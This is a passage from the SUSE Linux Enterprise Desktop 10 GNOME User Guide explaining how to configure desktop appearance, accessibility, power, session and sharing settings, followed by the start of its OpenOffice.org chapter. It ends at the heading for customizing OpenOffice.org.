The desktop background is the image or color that is applied to your desktop. You can customize the desktop background in the following ways: • Select an image for the desktop background. The image is superimposed on the desktop background color. The desktop background color is visible if you select a transparent image or if the image does not cover the entire desktop. • Select a color for the desktop background. You can select a solid color or create a gradient effect with two colors. A gradient effect is a visual effect where one color blends gradually into another color. To change the desktop preferences: 1 Click Computer > Control Center > Look and Feel > Desktop Background. 2 Set the desktop preferences the way that you want them. The following settings can be changed:
Table 2-7 Background Preferences
Option
Description
Desktop Wallpaper Style
Displays an image of your choice on the desktop. Determines what processing steps should be applied to the selected image to adapt it optimally to the current screen resolution. To specify how to display the image, select one of the following options from the Style drop-down list: • Centered: Displays the image in the middle of the desktop. • Fill Screen: Enlarges the image to cover the desktop and maintains the relative dimensions of the image. • Scaled: Enlarges the image until the image meets the screen edges and maintains the relative dimensions of the image. • Tiled: Repeats the image over the entire screen.
Add Wallpaper Remove
Opens a dialog where you can select an image file to use as the background picture. Removes a Desktop Wallpaper after you select it and then click Remove.
Customizing Your Settings
41
novdocx (ENU) 01 February 2006
Option
Description
Desktop Colors
Lets you specify a color scheme using the options in the Desktop Color drop-down list and the color selector buttons. You can specify a color scheme using any of the following options: • Solid Color specifies a single color for the desktop background. To select a color, click Color. In the Pick a Color dialog, select a color and then click OK • Horizontal Gradient creates a gradient effect from the left screen edge to the right screen edge. Click Left Color to display the Pick a Color dialog, then select the color that you want to appear at the left edge. Click Right Color, then select the color that you want to appear at the right edge. • Vertical Gradient creates a gradient effect from the top screen edge to the bottom screen edge. Click Top Color to display the Pick a Color dialog, then select the color that you want to appear at the top edge. Click Bottom Color, then select the color that you want to appear at the bottom edge.
3 When you are satisfied with your choices, click Close. Your desktop immediately changes to show the new settings.
2.2.2 Configuring Fonts
Use the Font Preferences dialog to select the fonts to use in your applications, windows, terminals, and desktop. To open the Font Preferences dialog, click Computer > Control Center > Look and Feel > Fonts.
Figure 2-11 Font Preferences Dialog
42
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
The upper part of the dialog shows the fonts selected for the application, desktop, window title, and terminal. Click one of the buttons to open a selection dialog where you can set the font family, style, and size. To specify how to render fonts on your screen, select one of the following options: •. • Best Shapes: Antialiases fonts where possible. Use this option for standard Cathode Ray Tube (CRT) monitors. • Best Contrast: Adjusts fonts to give the sharpest possible contrast and antialiases fonts so that characters have smooth edges. This option might enhance the accessibility of the GNOME Desktop to users with visual impairments. • Subpixel Smoothing (LCDs): Uses techniques that exploit the shape of individual Liquid Crystal Display (LCD) pixels to render fonts smoothly. Use this option for LCD or flat-screen displays. Click Details to specify further details of how to render fonts on your screen: • Resolution (Dots Per Inch): Use the spin box to specify the resolution to use when your screen renders fonts. • Smoothing: Select one of the options to specify how to antialias fonts. • Hinting: Select one of the options to specify how to apply hinting to improves the quality of fonts at small sizes and at low screen resolutions. • Subpixel Order: Select one of the options to specify the subpixel color order for your fonts. Use this option for LCD or flat-screen displays.
2.2.3 Configuring the Screen Saver
A screen saver is a program that blanks the screen or displays graphics when the computer is not used for a specified amount of time. Originally, screen savers protected monitors from having images burned into them. Now they are used primarily for entertainment or security.
Customizing Your Settings
43
novdocx (ENU) 01 February 2006
To configure a screen saver, click Computer > Control Center > Look and Feel > Screensaver.
Figure 2-12 Screensaver Preferences Dialog
You can select from Random (random selection of screen savers from a custom-defined list), Blank Screen, or a selection of installed screen savers. Select a screen saver from the list to choose it. The currently selected screen saver is displayed in the small preview window. Specify the amount of time that the screen is to be idle before the screen saver is activated, and whether the screen is locked when the screen saver is activated.
2.2.4 Choosing a Theme
A theme is a group of coordinated settings that specifies the visual appearance of a part of the desktop. You can choose themes to change the appearance of the desktop. Use the Theme Preferences tool to select from a list of preinstalled themes. The list of available themes includes several themes for users with accessibility requirements. To choose a theme, click Computer > Control Center > Look and Feel > Theme. A theme contains settings that affect different parts of the desktop, as follows: • Controls The controls setting for a theme determines the visual appearance of windows, panels, and applets. It also determines the visual appearance of the GNOME-compliant interface items that appear on windows, panels, and applets, such as menus, icons, and buttons. Some of the controls setting options that are available are designed for special accessibility needs. You can select an option for the controls setting in the Controls tabbed page of the Theme Details tool. • Window frame The window frame setting for a theme determines the appearance of the frames around windows only. You can select an option for the window frame setting in the Window Border tabbed page of the Theme Details tool.
44
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
• Icon The icon setting for a theme determines the appearance of the icons on panels and the desktop background. You can select an option for the icon setting in the Icons tabbed page of the Theme Details tool. The color settings for the desktop and applications are controlled using themes. You can choose from a variety of preinstalled themes. Selecting a style from the list overview applies it automatically. Details opens another dialog where you can customize the style of single desktop elements, like window content, window borders, and icons. Making changes and leaving the dialog by clicking Close switches the theme to Custom Theme. Click Save Theme to save your modified theme under a custom name. The Internet and other sources provide many additional themes for GNOME as .tar.gz files. Install these with the Install theme. Creating a Custom Theme The themes that are listed in the Theme Preferences tool are different combinations of controls options, window frame options, and icon options. You can create a custom theme that uses different combinations of options. 1 Click > Computer > Control Center > Look and Feel > Theme. 2 Select a theme from the list of themes, then click Theme Details. 3 Select the controls option that you want to use in the custom theme from the list in the Controls tabbed page. 4 Click the Window Border tab, then select the window frame option that you want to use in the custom theme. 5 Click the Icons tab, then select the icons option that you want to use in the custom theme. 6 Click Close > Save Theme. A Save Theme to Disk dialog is displayed. 7 Type a name and a short description for the custom theme in the dialog, then click Save. The custom theme now appears in your list of available themes. Installing a New Theme You can add a theme to the list of available themes. The new theme must be an archive file that is tarred and zipped (a .tar.gz file). 1 Click Computer > Control Center > Look and Feel > Theme. 2 Click Install Theme. 3 Specify the location of the theme archive file in the Location field, then click OK. You can also click Browse to browse for the file. 4 Click Install to install the new theme. Installing a New Theme Option You can install new controls options, window frame options, or icons options. You can find many controls options on the Internet. 1 Click Computer > Control Center > Look and Feel > Theme.
Customizing Your Settings
45
novdocx (ENU) 01 February 2006
2 Click Theme Details, then click the tab for the type of theme you want to install. For example, to install an icons option, click the Icons tab. 3 Click Install Theme. 4 Specify the location of the theme archive file in the Location field, then click OK. 5 Click Install to install the new theme option. Deleting a Theme Option You can delete controls options, window frame options, or icons options. 1 Click Computer > Control Center > Look and Feel > Theme. 2 Click Theme Details, then click the tab for the type of option you want to delete. 3 Click Go To Theme Folder. A File Manager window opens on the default option folder. 4 Use the File Manager window to delete the option.
2.2.5 Customizing Window Behavior
Use the Window Preferences tool to customize window behavior for the desktop. You can determine how a window reacts to contact with the mouse pointer or to double-clicks on its titlebar, and you can define which key to hold for moving an application window. To customize window behavior, click Computer > Control Center > Look and Feel > Windows.
Figure 2-13 Window Preferences Dialog
When several application windows populate the desktop, the active one by default is the one last clicked. Change this behavior by activating Select Windows When the Mouse Moves over Them. If desired, activate Raise Selected Window after an Interval and adjust the latency time with the slider. This raises a windows a short time after the window receives focus. Application windows can be shaded (rolled up) by double-clicking the title bar, leaving only the title bar visible. This saves space on the desktop and is the default behavior. It is also possible to set windows to maximize when the title bar is double-clicked.
46
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Using the radio buttons, select a modifier key to press for moving a window (Ctrl, Alt, Hyper, or the Windows logo key).
2.3 Personal
Personal settings include the following: • Section 2.3.1, “Configuring Keyboard Accessibility Settings,” on page 47 • Section 2.3.2, “Configuring Assistive Technology Support,” on page 49 • Section 2.3.3, “Changing Your Password,” on page 50 • Section 2.3.4, “Configuring Language Settings,” on page 50 • Section 2.3.5, “Customizing Keyboard Shortcuts,” on page 51
2.3.1 Configuring Keyboard Accessibility Settings
GNOME provides keyboard settings designed to help users with motion impairments use the GNOME desktop. Some of the available settings include: • How long a key is pressed and held before being recognized as valid input • Whether the keyboard can be used as a mouse • Whether key combinations that use Alt, Control, and Shift can be duplicated with “sticky keys” To configure keyboard accessibility settings, click Computer > Control Center > Accessibility.
Customizing Your Settings
47
novdocx (ENU) 01 February 2006
The module consists of the three tabs: Basic, Filters, and Mouse Keys. Before modifying settings, activate Enable Keyboard Accessibility Features.
Figure 2-14 Keyboard Accessibility Preferences Dialog
Features (Basic Tab) The keyboard accessibility functions can be deactivated automatically after a certain time. Set an appropriate time limit (measured in seconds) with the slider. The system can additionally provide audible feedback when the keyboard accessibility functions are activated and deactivated. Enable Sticky Keys (Basic Tab) Some keyboard shortcuts require that one key (a modifier key) is kept pressed constantly (this applies to Alt, Ctrl, and Shift) while the rest of the shortcut is typed. When sticky keys are used, the system regards those keys as staying pressed after being pressed once. For an audible feedback generated each time a modifier key is pressed, activate Beep when the modifier is pressed. If Disable If Two Keys Pressed Together is selected, the keys do not “stick” anymore when two keys are pressed simultaneously. The system then assumes that the keyboard shortcut has been completely entered. Enable Repeat Keys (Basic Tab) Activate Repeat Keys to make settings with sliders for Delay and Speed. This determines how long a key must be pressed for the automatic keyboard repeat function to be activated and at what speed the characters are then typed. Test the effect of the settings in the field at the bottom of the dialog. Select parameters that reflect your normal typing habits.
48
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Enable Slow Keys (Filters Tab) To prevent accidental typing, set a minimum time limit that a key must be pressed and held before it is recognized as valid input by the system. Also determine whether audible feedback should be provided for keypress events, accepted keypresses, and the rejection of a keypress. Enable Bounce Keys (Filters Tab) To prevent double typing, set a minimum time limit for accepting two subsequent keypress events of the same key as the input of two individual characters. If desired, activate audible feedback upon rejection of a keypress event. Toggle Keys (Filters Tab) You can request audible feedback from the system when a keycap modifier key is pressed. Mouse Keys Tab Activates the keyboard mouse; the mouse pointer is controlled with the arrow keys of the number pad. Use the sliders to set the maximum speed of the mouse pointer, the acceleration time until the maximum speed is reached, and the latency between the pressing of a key and the cursor movement.
2.3.2 Configuring Assistive Technology Support
SLED includes assistive technologies for users with special needs. These technologies include: • Screen reader • Screen magnifier • On-screen keyboard To configure assistive technology options, click Computer > Control Center > Personal > Assitive Technology. To enable the technologies, first select Enable Assistive Technologies and then select the technologies you want to enable every time you log in.
Figure 2-15 Assistive Technology Preferences Dialog
Customizing Your Settings
49
novdocx (ENU) 01 February 2006
The gok package must be installed in order to get on-screen keyboard support, and the gnopernicus and gnome-mag packages must be installed in order to get screenreading and magnifying capabilities. If these packages are not installed on your system (they are installed by default in the SLED installation), install them with the following procedure: 1 Click System > Administrator Settings. 2 Type the root password, then click OK. 3 Click Software > Install and Remove Software. 4 Select Selection from the Filter drop-down menu, then select Accessibility from the Selection list. 5 Select gok, gnopernicus, and gnome-mag from the Package list 6 Click Accept. 7 Insert SUSE Linux Enterprise Desktop 10 CD 2, then click OK. 8 Click Cancel > Close after the package installation is complete.
2.3.3 Changing Your Password
For security reasons, it is a good idea to change your password from time to time. To change your password: 1 Click Computer > Control Center > Personal > Change Password. 2 Type your old (current) password. 3 Type your new password. 4 Confirm your new password by typing it again, then click OK.
2.3.4 Configuring Language Settings
SLED can be configured to use any of many languages. The language setting determines the language of dialogs and menus, and can also determine the keyboard and clock layout. You can set the following language settings: • Primary language • Whether the keyboard language setting should depend on the primary language • Whether the time zone should depend on the primary language • Secondary languages NOTE: You must have administrator (root) privileges to configure language settings. To configure your language settings: 1 Click Computer > Control Center > Personal > Language. 2 (Conditional) If you are not logged in as root or a user with administrator privileges, enter the root password.
50
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
If you do not know the root password, contact your system administrator. You cannot continue without the root password. 3 Specify the primary language, whether you want to adapt the keyboard layout or time zone to the primary language, and any secondary languages you need to support on the computer. 4 Click Accept. The language configuration settings are written to several configuration files. This process can take a few minutes. The new settings take effect immediately after they are written to the configuration files.
2.3.5 Customizing Keyboard Shortcuts
A keyboard shortcut is a key or combination of keys that provides an alternative to standard ways of performing an action. SLED allows you to customize the keyboard shortcuts for a number of actions. To open the Keyboard Shortcuts tool, click Computer > Control Center > Personal > Shortcuts.
Figure 2-16 Keyboard Shortcuts Dialog
To change the shortcut keys for an action, select the action and then press the keys you want to associate with the action. To disable the shortcut keys for an action, click the shortcut for the action, then press Backspace.
2.4 System
System settings include the following: • Section 2.4.1, “Configuring Search with Beagle Settings,” on page 52 • Section 2.4.2, “Configuring Date and Time,” on page 52 • Section 2.4.3, “Configuring Network Proxies,” on page 52 • Section 2.4.4, “Configuring Power Management,” on page 53 • Section 2.4.5, “Setting Preferred Applications,” on page 54
Customizing Your Settings
51
novdocx (ENU) 01 February 2006
• Section 2.4.6, “Setting Session Sharing Preferences,” on page 55 • Section 2.4.7, “Managing Sessions,” on page 56 • Section 2.4.8, “Setting Sound Preferences,” on page 59 • Section 2.4.9, “Managing Users and Groups,” on page 61
2.4.1 Configuring Search with Beagle Settings
Beagle is the search engine used on the SLED GNOME Desktop. By default, Beagle is configured to start automatically and index your home directory. If you want to change these settings, specify the number of results displayed after a search or change the Beagle privacy settings, click Computer > Control Center > System > Beagle Settings.
2.4.2 Configuring Date and Time
To change your date and time configuration, for example to change your time zone or the way the date and time are displayed, click Computer > Control Center > System > Date and Time. This opens the YaST Date and Time module, which requires root privileges. Enter the root password and follow the instructions on the YaST pages.
2.4.3 Configuring Network Proxies
The Network Proxy Configuration tool lets you configure how your system connects to the Internet. You can configure the desktop to connect to a proxy server and specify the details of the server. A proxy server is a server that intercepts requests to another server and fulfills the request itself, if it can. You can specify the Domain Name Service (DNS) name or the Internet Protocol (IP) address of the proxy server. A DNS name is a unique alphabetic identifier for a computer on a network. An IP address is a unique numeric identifier for a computer on a network. Click Computer > Control Center > System > Network Proxies.
Figure 2-17 Network Proxy Configuration Dialog
The following table lists the Internet connection options that you can modify.
52
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Table 2-8 Internet Connection Options
Option
Description
Direct Internet connection Manual proxy configuration HTTP proxy
Connects directly to the Internet, without a proxy server. Connects to the Internet through a proxy server and lets you configure the proxy server manually. The DNS name or IP address of the proxy server to use when you request a HTTP service. Specify the port number of the HTTP service on the proxy server in the Port box. The DNS name or IP address of the proxy server to use when you request a Secure HTTP service. Specify the port number of the Secure HTTP service on the proxy server in the Port box. The DNS name or IP address of the proxy server to use when you request an FTP service. Specify the port number of the FTP service on the proxy server in the Port box. The DNS name or IP address of the Socks host to use. Specify the port number for the Socks protocol on the proxy server in the Port spin box. Connects to the Internet through a proxy server and lets you configure the proxy server automatically. The URL that contains the information required to configure the proxy server automatically.
Secure HTTP proxy
FTP proxy
Socks host
Automatic proxy configuration Autoconfiguration URL
2.4.4 Configuring Power Management
This module lets you manage your system’s power-saving options. It is especially useful for extending the life of a laptop’s battery charge. However, several options also help to save electricity when using a computer that is plugged in to an electricity source. Click Computer > Control Center > System > Power Management. Specifying Sleep Mode Times Sleep mode shuts down the computer when it is unused for a specified amount of time. Whether under battery or AC power, you can specify the amount of time that the computer remains unused before it is put to sleep.You can also put the computer’s display to sleep without shutting down the computer, saving the power required by the display. Sleep mode is especially important when the computer is operating under battery power. Both the screen and the computer draw power from the battery, so you can save a significant amount of battery power by shutting down one or both. It is common to put the display to sleep after a shorter period of time. (The default is five minutes.) Then, if the computer remains unused for a further amount of time (default 20 minutes), it is also put to sleep. To specify your computer’s sleep settings, open the Power Management module and click the Sleep tab. Then, specify the amount of time that should pass before the display and computer are put to sleep, for both AC power and battery power.
Customizing Your Settings
53
novdocx (ENU) 01 February 2006
Setting Power Options To set the type of sleep mode used by your computer and the action to take when the battery power reaches the critical level, open the Power Management module and click the Options tab. There are two available types of sleep mode: • Standby Standby mode turns off power-consuming computer components such as the display and the hard drive without saving the contents of RAM. Any unsaved data is lost. • Hibernate Hibernate mode saves all contents of RAM to the hard disk before shutting off power to the system. When you start the system again, the saved data is put back into RAM, restoring your computer to the state it was in before it shut off. Hibernate requires an amount of free hard disk space equal to the amount of RAM installed on the computer. Choose the type of sleep mode you prefer by selecting it from the menu. If you have sufficient free disk space, Hibernate is the better choice. You can also specify what your computer does when the battery reaches the critical level. The available options are: • Do Nothing The computer does not shut down or automatically go into any kind of power-saving mode. • Hibernate The computer saves the contents of RAM to the hard disk, then shuts down. When you turn the computer on again, the saved data is put back into RAM, restoring your computer to the state it was in before it shut off. Hibernate requires an amount of free hard disk space equal to the amount of RAM installed on the computer. • Shut Down The computer turns off without saving anything. All unsaved data is lost. Choose the option you prefer by selecting it from the menu. If you have sufficient free disk space, Hibernate is the better choice. Setting Advanced Power Options The available advanced power options allow you to display how and when the Power icon displays, and at what point the battery is considered low or critical. Open the Power Management module, then click the Advanced tab to set these options. You can specify whether the power icon is always or never displayed in the System Tray, or that it is present only when the battery is low, or when it is either charging or discharging. You can also select the percentage of battery power remaining that is to be considered low or critical. Slide the slider for each option until the desired percentage is specified.
2.4.5 Setting Preferred Applications
The Preferred Applications module allows you to specify which applications to use for various common tasks:
54
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
To change any of these settings: 1 Click Computer > Control Center > System > Preferred Applications. 2 Click the tab for the type of application you want to set. The following list shows the options and default settings. • Web browser Default: Firefox • Mail reader Default: Evolution • FTP Default: Nautilus • News Default: Thunderbird • Terminal GNOME Terminal 3 Select one of the available from the applications from the Choose menu or enter the command used to start the application. 4 Click Close. The changes take effect immediately.
2.4.6 Setting Session Sharing Preferences
The Remote Desktop preference tool enables you to share a GNOME desktop session between multiple users, and to set session-sharing preferences. To open this tool, click Computer > Control Center > System > Remote Desktop. The table below shows the session sharing preferences that can be set with this tool. These settings have a direct impact on the security of your system.
Table 2-9 Session Sharing Preferences
Dialog Element
Description
Allow other users to view your desktop Select this option to enable remote users to view your session. All keyboard, pointer, and clipboard events from the remote user are ignored. Allow other users to control your desktop Users can view your desktop using this command Select this option to allow other users to access and control your session from a remote location. Click on the highlighted text to send the system address to remote user by e-mail.
Customizing Your Settings
55
novdocx (ENU) 01 February 2006
Dialog Element
Description
When a user tries to view or control your desktop
Select from the following security considerations when a user tries to view or control your desktop: • Ask you for confirmation Select this option if you want remote users to ask you for confirmation when they want to share your session. This option enables you to be aware when other users connect to your session. You can also decide what time is suitable for the remote user to connect to your session. • Require the user to enter this password Select this option to authenticate the remote user if authentication is used. This option provides an extra level of security.
Enter the password that the remote user who wants to view or control your session must enter.
2.4.7 Managing Sessions
This module lets you manage your sessions. A session occurs between the time that you log in to the desktop environment and the time that you log out. You can set session preferences and specify which applications to start when you begin a session. You can configure sessions to save the state of applications and then restore the state when you start another session. You can also use this preference tool to manage multiple sessions. For example, you might have a mobile session which starts applications you use most frequently when traveling, a demo session that starts applications used to present a demonstration or slide show to a customer, and a work session that uses a different set of applications when you are working in the office. Click Computer > Control Center > System > Sessions. This module consists of three tabbed pages: • Session Options: Lets you manage multiple sessions and set preferences for the current session. • Current Session: Lets you specify startup order values and select restart styles for the sessionmanaged applications in your current session. • Startup Programs: Lets you specify non-session-managed startup applications, which start automatically when you start a session.
56
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Setting Session Preferences Use the Session Options tabbed page to manage multiple sessions and set preferences for the current session.
Figure 2-18 Sessions Dialog—Session Options Page
The following table lists the session options that you can modify.
Table 2-10 Session Preferences for Current Session
Option
Description
Show Splash Screen on Login Prompt on Logout
Displays a splash screen when you start a session. Displays a confirmation dialog when you end a session.
Automatically Save Changes to Session Automatically saves the current state of your session. The session manager saves the session-managed applications that are open and the settings associated with the sessionmanaged applications. The next time you start a session, the applications start automatically with the saved settings. If you do not select this option, the Logout Confirmation dialog displays a Save Current Setup option when you end your session. Sessions Lets you manage multiple sessions in the desktop, as follows: • To create a new session, click Add. The Add a New Session dialog is displayed, letting you specify a name for your session. • To change the name of a session, select the session and then click Edit. The Edit Session Name dialog is displayed, letting you specify a new name for your session. • To delete a session, select the session and then click Delete.
Customizing Your Settings
57
novdocx (ENU) 01 February 2006
Setting Session Properties Use the Current Session tabbed page to specify startup order values and to choose restart styles for the session-managed applications in your current session.
Figure 2-19 Sessions Dialog—Current Session Page
The following table lists the session properties that you can configure.
Table 2-11 Session Properties for Session-Managed Applications
Option
Description
Order
Specifies the order in which the session manager starts session-managed startup applications. The session manager starts applications with lower order values first. The default value is 50. To set the startup order of an application, select the application in the table. Use the Order box to specify the startup order value.
Style
Determines the restart style of an application. To select a restart style for an application, select the application in the table and then select one of the following styles: • Normal: Starts automatically when you start a session. Use the kill command to terminate applications with this restart style during a session. • Restart: Restarts automatically when you close or terminate the application. Select this style for an application if it must run continuously during your session. To terminate an application with this restart style, select the application in the table and then click Remove. • Trash: Does not start when you start a session. • Settings: Starts automatically when you start a session. Applications with this style usually have a low startup order and store your configuration settings for GNOME and session-managed applications.
Remove
Deletes the selected application from the list. The application is removed from the session manager and closed. Applications that you delete are not started the next time you start a session. Applies changes made to the startup order and the restart style.
Apply
58
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Configuring Startup Applications Use the Startup Programs tabbed page to specify non-session-managed startup applications.
Figure 2-20 Sessions Dialog—Startup Programs Page
Startup applications are applications that start automatically when you begin a session. You specify the commands that run these applications and the commands execute automatically when you log in. You can also start session-managed applications automatically. For more information, see “Setting Session Preferences” on page 57. To add a startup application, click Add. The Add Startup Program dialog is displayed. Specify the command to start the application in the Startup Command field. If you specify more than one startup application, use the Order box to specify the startup order of the each application. To edit a startup application, select the startup application and then click Edit. The Edit Startup Program dialog is displayed. Modify the command and the startup order for the startup application. To delete a startup application, select the startup application and then click Delete.
2.4.8 Setting Sound Preferences
The Sound Preference tool lets you control when the sound server starts. You can also specify which sounds to play when particular events occur. Click Computer > Control Center > System > Sound.
Customizing Your Settings
59
novdocx (ENU) 01 February 2006
Setting General Sound Preferences Use the Sounds tab to specify when to launch the sound server. You can also enable sound event functions.
Figure 2-21 Sound Preferences Dialog—General Page
Click Enable software sound mixing (ESD) to start the sound server when you start a session. When the sound server is active, the desktop can play sounds. Click Play system sounds to play sounds when particular events occur in the desktop. Finally, select the sound to play at each of the specified events.
60
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
Setting System Beep Preferences Some applications play a beep sound to indicate a keyboard input error. Use the System Beep tab to set preferences for the system beep.
Figure 2-22 Sound Preferences Dialog—System Beep Page
2.4.9 Managing Users and Groups
Use the User Management tool to manage users and groups, including user and group names, group membership, password and password encryption, and other options. Click Computer > Control Center > System > User Management. The User Management tool opens the User and Group Administration module in YaST.
Customizing Your Settings
61
novdocx (ENU) 01 February 2006
NOTE: Root privileges are required to manage users and groups. Follow the directions in YaST for information on changing settings.
62
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
I
Office and Collaboration
II
Office and Collaboration
63
novdocx (ENU) 01 February 2006
64
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
3
The OpenOffice.org Office Suite
3
OpenOffice.org is a powerful open-source office suite that provides tools for all types of office tasks, such as writing texts, working with spreadsheets, or creating graphics and presentations. With OpenOffice.org, you can use the same data across different computing platforms. You can also open and edit files in other formats, including Microsoft Office, then save them back to this format, if needed. This chapter covers information about the Novell® edition of OpenOffice.org and some of the key features you should be aware of when getting started with the suite. • Section 3.1, “Understanding OpenOffice.org,” on page 65 • Section 3.2, “Word Processing with Writer,” on page 72 • Section 3.3, “Using Spreadsheets with Calc,” on page 78 • Section 3.4, “Using Presentations with Impress,” on page 80 • Section 3.5, “Using Databases with Base,” on page 81 • Section 3.6, “Creating Graphics with Draw,” on page 83 • Section 3.7, “Creating Mathematical Formulas with Math,” on page 84 • Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84 OpenOffice.org consists of several application modules (subprograms), which are designed to interact with each other. They are listed in Table 3-1. A full description of each module is available in the online help, described in Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84.
Table 3-1 The OpenOffice.org Application Modules
Module
Purpose
Writer Calc Impress Base Draw Math
Word processor application module Spreadsheet application module Presentation application module Database application module Application module for drawing vector graphics Application module for generating mathematical formulas
The appearance of the application varies depending on the desktop or window manager you use. Regardless of the appearance, the basic layout and functions are the same.
3.1 Understanding OpenOffice.org
This section contains information that applies to all of the application modules in OpenOffice.org. Module-specific information can be found in the sections relating to each module. • Section 3.1.1, “What’s New in OpenOffice.org 2.0,” on page 66
The OpenOffice.org Office Suite
65
novdocx (ENU) 01 February 2006
• Section 3.1.2, “Enhancements in the Novell Edition of OpenOffice.org 2.0,” on page 66 • Section 3.1.3, “Using the Standard Edition of OpenOffice.org,” on page 67 • Section 3.1.4, “Compatibility with Other Office Applications,” on page 67 • Section 3.1.5, “Starting OpenOffice.org,” on page 69 • Section 3.1.6, “Improving OpenOffice.org Load Time,” on page 69 • Section 3.1.7, “Customizing OpenOffice.org,” on page 69 • Section 3.1.8, “Finding Templates,” on page 72
3.1.1 What’s New in OpenOffice.org 2.0
OpenOffice.org 2.0 contains many improvements and features that were not included in earlier versions. The biggest new feature is the Base database module. There have been many other changes since the previous version, such as enhanced PDF export and improved word count capabilities. For a complete list of features, fixes, and enhancements, go to the OpenOffice.org Web site (http://).
3.1.2 Enhancements in the Novell Edition of OpenOffice.org 2.0
The Novell Edition of OpenOffice.org included with SLED contains enhancements that are not available in the standard edition. These include: Integration with SUSE Linux Enterprise Desktop The Novell Edition of OpenOffice.org features redesigned tool bar icons for maximum consistency with SUSE Linux Enterprise Desktop, including support for desktop appearance or theme changes. These features provide a consistent interface across the Linux desktop, which enhances overall usability and helps minimize enterprise training and support requirements. Native Desktop Dialogs The Novell Edition of OpenOffice.org uses your desktop’s native file dialogs rather than those in the standard edition. This provides the same look and feel of other applications in your environment, giving you a consistent, familiar experience. Enhanced Support for Microsoft Office File Formats OpenOffice.org supports import and export of Microsoft Office file formats, even taking advantage of compatible fonts to match document length. Transparent document sharing makes OpenOffice.org the best choice if you are deploying Linux desktops. If that option is selected, the file is automatically converted and attached to an e-mail in your default e-mail application.
66
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006. This allows OpenOffice.org to match fonts when opening documents originally composed in Microsoft Office, and very closely match pagination and page formatting. Integration with Novell Evolution The Novell Edition of OpenOffice.org is tightly integrated with Novell Evolution™, allowing users to send documents as e-mail and to perform mail merges using the Evolution address book as a datasource. Improved File Access Files are available from any source available to the computer. Network files open and save seamlessly. Anti-aliased Presentation Graphics With hardware acceleration enabled (the default), the Novell Edition of OpenOffice.org provides higher-quality graphics in Impress slide shows. Faster Start-up Times The Novell Edition of OpenOffice.org includes an improved built-in quickstarter that loads OpenOffice.org components at system startup and thus improves the application’s start-up time. Subsequent document load times have also been improved.
3.1.3 Using the Standard Edition of OpenOffice.org
The standard edition of OpenOffice.org also works with SLED. If you install the latest version of OpenOffice.org, all of your Novell Edition files remain compatible. However, the standard edition does not contain the Novell enhancements.
3.1.4 Compatibility with Other Office Applications
OpenOffice.org can work with documents, spreadsheets, presentations, and databases in many other formats, including Microsoft Office. They can be seamlessly opened like other files and saved back to the original format. Because the Microsoft formats are proprietary and the specifications are not available to other applications, there are occasionally formatting issues. If you have problems with your documents, consider opening them in the original application and resaving in an open format such as RTF for text documents or CSV for spreadsheets.
The OpenOffice.org Office Suite
67
novdocx (ENU) 01 February 2006
TIP: For good information about migrating from other office suites to OpenOffice.org, refer to the OpenOffice.org Migration Guide ( 0600MG-MigrationGuide.pdf). Converting Documents to the OpenOffice.org Format OpenOffice.org can read, edit, and save documents in a number of formats. It is not necessary to convert files from those formats to the OpenOffice.org format to use those files. However, if you want to convert the files, you can do so. To convert a number of documents, such as when first switching to OpenOffice.org, do the following: 1 Select File > Wizard > Document Converter. 2 Choose the file format from which to convert. There are several StarOffice and Microsoft Office formats available. 3 Click Next. 4 Specify where OpenOffice.org should look for templates and documents to convert and in which directory the converted files should be placed. IMPORTANT: Documents from a Windows partition are usually in a subdirectory of / windows. 5 Make sure that all other settings are appropriate, then click Next. 6 Review the summary of the actions to perform, then start the conversion by clicking Convert. The amount of time needed for the conversion depends on the number of files and their complexity. For most documents, conversion does not take very long. Sharing Files with Users of Other Office Suites OpenOffice.org is available for a number of operating systems. This makes it an excellent tool when a group of users frequently need to share files and do not use the same system on their computers. When sharing documents with others, you have several options. If the recipient needs to be able to edit the file: Save the document in the format the other user needs. For example, to save as a Microsoft Word file, click File > Save As, then select the Microsoft Word file type for the version of Word the other user needs. If the recipient only needs to read the document: Export the document to a PDF file with File > Export as PDF. PDF files can be read on any platform using a viewer like Adobe Acrobat Reader. If you want to share a document for editing: Use one of the standard document formats. The default formats comply with the OASIS standard XML format, making them compatible with a number of applications. TXT and RTF formats, although limited in formatting, might be a good option for text documents. CSV is useful for spreadsheets. OpenOffice.org might also offer your recipient's preferred format, especially Microsoft formats. If you want to e-mail a document as a PDF: Click File > Send > Document as PDF Attachment.Your default e-mail program opens with the file attached. If you want to e-mail a document to a Microsoft Word user: Click File > Send > Document as MS-Doc Attachment. Your default e-mail program opens with the file attached.
68
SUSE Linux Enterprise Desktop 10 GNOME User Guide
novdocx (ENU) 01 February 2006
3.1.5 Starting OpenOffice.org
1 Start the application in one of the following ways: • On the menu bar, click . This opens Writer. To open a different module, click File > New from the newly opened Writer document, then choose the module you want to open. • From the Computer menu, click Computer > More Applications > Office, then click the name of the OpenOffice.org module you want to start. • In a terminal window, enter ooffice. The OpenOffice.org window opens. Click File > New, then choose the module you want to open. 2 Select the module you want to open. If any OpenOffice.org application is open, you can open any of the other applications by clicking File > New > Name of Application.
3.1.6 Improving OpenOffice.org Load Time
To speed up the load time of OpenOffice.org by preloading the application at system startup: 1 Click Tools > Options > Memory. 2 Select Start at Startup. The next time you restart your system, OpenOffice.org will preload. When you open an OpenOffice.org application module, it will open faster.
3.1.7 Customizing OpenOffice.org
